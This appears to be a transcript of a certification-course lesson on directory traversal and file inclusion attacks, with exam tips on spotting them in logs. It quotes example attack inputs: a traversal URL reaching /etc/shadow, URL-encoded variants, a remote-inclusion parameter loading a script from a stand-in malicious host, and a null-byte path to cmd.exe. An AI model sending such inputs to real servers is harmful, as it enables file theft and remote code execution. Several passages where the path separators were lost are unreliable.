In this lesson, we're going to talk about directory traversal attacks and the vulnerabilities associated with them. Now, when we talk about a directory traversal attack, this is a type of injection attack. And injection attacks occur when the attacker inserts malicious code through an application interface. Now, the one we're going to talk about specifically here and focus on is directory traversal. Now, a directory traversal is a type of injection attack, and any kind of injection attack really focuses on the ability for the attacker to insert malicious code through an application interface. Now, when we talk about a directory traversal, we're talking about an application attack that allows access to commands and files and directories that may or may not be connected to the web document root directory. Now, if you're running a web server, you're running this on Windows or Mac or Linux or Unix or some kind of operating system. And there's going to be a folder in there that is called the web document root. Essentially, that folder is where, when you go to deontraining.com, it goes to find those files. Now, that isn't the root of your hard drive, it's just the root of that directory. But there's many folders above that. And so if I went to something like deontraining.com etc/shadow, that would try to go and find that shadow file. Now, that shadow file isn't inside the web root though. Instead, it's located on some other file off of the directory. And so what we're doing here with that /// is doing a directory traversal. Now, let me show you what this looks like graphically. Essentially, we have something that looks like this. The root is the actual root of your hard drive. So my server happens to be using Linux. And because we're using Linux, we're going to be using that slash. Now that's the root. Underneath that, I have two folders. I have /etc and /home. Now, if I go underneath the home directory, I have /programs. And if I go under that, I have /www root. And under that, that's where my web pages are stored. So the www root, that is my web root directory for those documents. So when somebody tries to go to deontraining.com /etc/shadow, what are they trying to do? Well, if we start with deontraining.com, that's going to load index.html or index.php from the web pages. That's that blue thing in the bottom right corner. Now, when I go .. I go up into the folder above it. And then .. goes again up into the folder above it. .. goes up into the folder above it. .. goes up into the root directory now. And then I go /etc down into the etc folder. And then /shadow, I'm going to try to read that shadow file. That's what they're doing here. That's what a directory traversal is. And so if we can read those files or execute those files by doing this, we can do that from a URL by typing into a browser and remotely attack that system. So we don't want this to happen, right? Now, when we look at these, you're going to see a lot of these .. or .. Now, in this case, it's .. because Unix systems like Linux and Mac, they use .. If you're using a Windows system, so you're using IIS as your web server, it's going to use .. Because on a Windows system, you have your C drive, C://, and so you're going to be using .. But a lot of times Windows is configured to accept either way, the / or the /, and it will accept both. Now, what we want to do with these directory traversals is prevent them from happening. So how can we do that? Now, the problem with these directory traversals, like I said, is that they can be used to access any file on a system if they have the right permissions. So if I configure my server correctly, you're not going to have access as a web user to read my shadow file or my password file. But if I didn't have it correctly, you could access those and read those right from your browser. And so we want to be able to prevent this from happening. Now, one thing I want to warn you about, you're not always just going to see the .. Now, that is the most common way to see it, especially on the exam, to identify a directory traversal. But remember we talked about encoding all the way back earlier in the course? Well, people can use encoding against you as well. Attackers can use encoding to hide their directory traversal attempts. So instead of using .. they might use %2e, %2e, %2f, and that would be .. So keep that in mind as well. Now, another vulnerability we have to talk about when we talk about directory traversals is file inclusion. File inclusion is when a web application vulnerability is being exploited that allows an attacker to either download a file from an arbitrary location on the host file system by using that directory traversal, or upload an executable or script file to open a backdoor. Now, this will come in two different flavors. We have remote file inclusions and local file inclusions. When we talk about a remote file inclusion, This occurs when an attacker tries to execute a script to inject a remote file into the web app or the website. So if I use something like https://diontraining.com/login.php, that part is fine. Then I have a question mark, user equals. This is passing the parameter of which user I want to log in as. Now, what user am I going to log into? Am I going to log in as Jason? No, we're going to log in as http://malware.bad/malicious.php. So what we're doing is we're passing this parameter, and when our system executes and tries to find that parameter to load it into our database, instead, we're going to load in this malicious script. So this is the idea of a remote file inclusion. We're including this remote file, malicious.php, from this other website into my web server using this type of command. Now, another one you can use is what's called local file inclusion. Now, local file inclusions are where an attacker tries to add a file to the web app or website that already exists on the hosting server. So let's say on my website, we might allow you to upload something like a picture or a PDF or other files as part of our community forum. Well, then you could reference that file because it's already sitting on my server. So in this case, you would do something like https://diontraining.com/login.php ? User equals, and now here you see this directory traversal, //windows/system32/cmd.exe%00. Now, what are they trying to do? This is assuming that I have a Windows server, and they're trying to go up two directories, into the Windows directory, down into System32, and run the command shell. This way, they can run any program they want that executes in DOS or Windows. Now, what is that %00 at the end? Well, that's a common tactic that's used to insert a null character at the end of your URL. That %00 in URL encoding is essentially a null character, and so this is being used to request to bypass the security mechanisms that would normally add a .php to the end of the request and instead allow us to use that .exe extension. Now, for the exam, let me give you a couple of quick tips. Anytime you see something with .. I want you to think directory traversal. This is what the answer is most likely going to be. Now, the reason for this is because on the exam, they're going to bring up the idea of directory traversal a lot. Now, you might also get some questions about local file inclusions, and if that's the case, that is a type of directory traversal. Now, if you get a question like this on the exam, you're not going to have answer choices A, B, C, and D, where A is directory traversal and B is local file inclusion. They won't do that to you. Instead, you're going to have, on this question, directory traversal. On another one, you might have local file inclusion. So if you see .. it's one of those two things. Now, when you're on the exam, you're going to be asked to look at logs and things like proxy servers. And as you're looking through the proxy server logs, you're going to see these different URLs inside those logs. And as you look at them, anytime you see that .. I want you to remember that is directory traversal. And that'll be the right answer for you on the exam.